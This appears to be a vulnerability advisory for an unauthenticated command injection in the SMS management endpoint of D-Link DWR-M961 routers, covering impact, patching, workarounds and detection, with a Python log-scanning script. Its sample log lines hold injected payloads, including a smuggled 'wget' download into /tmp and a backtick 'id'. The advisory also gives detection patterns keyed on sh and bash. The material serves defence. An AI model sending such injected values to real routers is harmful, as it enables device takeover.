CVE-2026-1625

6.3 MEDIUM

📋 TL;DR

This CVE describes an OS command injection vulnerability in the SMS message management component of D-Link DWR-M961 routers (the /boafrm/formSmsManage handler of the embedded web server) that allows remote attackers to execute arbitrary commands on the device. The endpoint can be reached without authentication, so anyone who can send HTTP requests to the management interface can exploit it. Organizations running DWR-M961 routers on the affected firmware are exposed.

💻 Affected Systems

Products:
  • D-Link DWR-M961
Versions: Firmware version 1.1.47
Operating Systems: Embedded Linux
Default Config Vulnerable: ⚠️ Yes
Notes: All devices running the vulnerable firmware version are affected regardless of configuration.

⚠️ Risk & Real-World Impact

🔴 Worst Case

Complete compromise of the router, allowing attackers to establish persistent access, intercept network traffic, pivot to internal networks, and potentially brick the device.

🟠 Likely Case

Attackers gain shell access to the router, enabling them to modify configurations, install malware, or enrol the device in a botnet.

🟢 If Mitigated

With network segmentation and access controls in place, impact is limited to the router itself without lateral movement to other systems.

🌐 Internet-Facing: HIGH - The vulnerability can be exploited remotely without authentication on internet-facing routers.
🏢 Internal Only: MEDIUM - Internal routers could be exploited by compromised internal hosts or malicious insiders.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Public exploit details are available on GitHub, making exploitation straightforward for attackers with basic skills.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: https://www.dlink.com/

Restart Required: Yes

Instructions:

1. Check the D-Link support site for DWR-M961 firmware updates
2. Download the latest firmware if available and confirm from its release notes that it addresses CVE-2026-1625 (no fixed version is named above, so a newer version number alone is not proof of a fix)
3. Upload the firmware via the router admin interface
4. Reboot the router after the update and re-check the reported firmware version

🔧 Temporary Workarounds

Disable SMS Management Interface (applies to: all)

Disable the vulnerable SMS management component if it is not needed. Disabling the feature in the UI does not guarantee that the /boafrm/formSmsManage handler stops accepting requests; after the change, confirm that a POST to that path from an untrusted network is rejected.

Network Segmentation (applies to: all)

Isolate the router management interface from untrusted networks, including the WAN side and any guest or IoT segments.

🧯 If You Can't Patch

  • Remove internet-facing access to router management interface
  • Implement strict firewall rules to limit access to router from trusted IPs only

🔍 How to Verify

Check if Vulnerable:

Check the router firmware version in the admin interface. If the version is 1.1.47, the device is vulnerable. Other versions have not been confirmed as safe on this page, so treat any firmware without a vendor statement about CVE-2026-1625 as suspect.

Check Version:

Check via the router web interface at System > Firmware, or via SSH if enabled.

Verify Fix Applied:

Verify that the firmware version is later than 1.1.47 and that the vendor release notes for that version reference CVE-2026-1625; because no patch version is listed, a version bump alone does not prove the fix is present.

📡 Detection & Monitoring

Log Indicators:

  • Unusual POST requests to /boafrm/formSmsManage
  • Suspicious command execution in system logs
  • Unexpected configuration changes

Network Indicators:

  • Unusual outbound connections from router
  • Traffic to known malicious IPs
  • Port scanning originating from router

SIEM Query:

source="router_logs" AND (uri="/boafrm/formSmsManage" OR command="*sh*" OR command="*bash*")

Caveats: the router itself rarely exports HTTP access logs, so this query is most useful against the logs of a reverse proxy, IDS or firewall placed in front of the management interface. The command="*sh*" clause also matches benign words such as "flush" or "hash"; a tighter rule keys on the URI together with shell metacharacters (";", "|", "`", "$(") in the request body.
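As an added example (not from the advisory or from D-Link), the script below applies the detection logic above to access log lines from a proxy or IDS in front of the router: it flags every POST to /boafrm/formSmsManage and raises an alert when a form field in the body contains shell metacharacters. The log line layout, the form field names and the sample lines are constructed for this example; the real vulnerable parameter is not named on this page, so every field is inspected.

```python
"""Flag suspicious requests to the DWR-M961 SMS management endpoint.

Added example. Scans proxy/IDS-style access log lines for POSTs to
/boafrm/formSmsManage whose body carries shell metacharacters. The log
layout, body format and parameter names are assumptions for this example.
"""
import re
from urllib.parse import parse_qs

TARGET_PATH = "/boafrm/formSmsManage"

# Characters that chain, substitute or redirect commands in a POSIX shell.
# Any of these inside a parameter value is the injection signal.
SHELL_META = re.compile(r"[;&|`$<>\n]")

# Assumed log layout (constructed): <client ip> <method> <path> "<request body>"
LOG_RE = re.compile(r'^(?P<ip>\S+) (?P<method>[A-Z]+) (?P<path>\S+) "(?P<body>.*)"$')


def parse_line(line):
    """Return the fields of one log line, or None if it does not match the layout."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def suspicious_fields(body):
    """Return {field: decoded value} for every form field holding shell metacharacters."""
    hits = {}
    # parse_qs percent-decodes values and turns '+' into spaces.
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            if SHELL_META.search(value):
                hits[name] = value
    return hits


def classify(line):
    """Return (severity, reason) for traffic to the SMS endpoint, else None.

    'alert'  : POST with shell metacharacters in a form field (likely injection)
    'notice' : any other request to the endpoint (worth reviewing on an unauthenticated path)
    """
    rec = parse_line(line)
    if rec is None or rec["path"].split("?")[0] != TARGET_PATH:
        return None
    if rec["method"] != "POST":
        return ("notice", f"{rec['method']} to SMS management endpoint from {rec['ip']}")
    hits = suspicious_fields(rec["body"])
    if hits:
        return ("alert", f"shell metacharacters in {sorted(hits)} from {rec['ip']}")
    return ("notice", f"POST to SMS management endpoint from {rec['ip']}")


def scan(lines):
    """Classify every line and drop unrelated traffic."""
    results = []
    for line in lines:
        verdict = classify(line)
        if verdict is not None:
            results.append(verdict)
    return results


# Constructed sample log; field names are placeholders, not the device's real form fields.
SAMPLE_LOG = [
    '203.0.113.7 POST /boafrm/formSmsManage "smsNumber=%2B15551234&smsContent=hello"',
    '198.51.100.9 POST /boafrm/formSmsManage "smsNumber=1%3B+wget+http%3A%2F%2F198.51.100.9%2Fx+-O+%2Ftmp%2Fx&smsContent=a"',
    '192.0.2.5 GET /index.htm ""',
    '192.0.2.6 POST /boafrm/formSmsManage "smsContent=%60id%60"',
]

if __name__ == "__main__":
    for severity, reason in scan(SAMPLE_LOG):
        print(f"[{severity}] {reason}")
```

Run against real logs by replacing SAMPLE_LOG with lines read from the proxy or IDS, after adjusting LOG_RE to that product's format. Matching on the URI first keeps the metacharacter check from firing on unrelated traffic, which is what makes the rule usable on a busy edge device.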
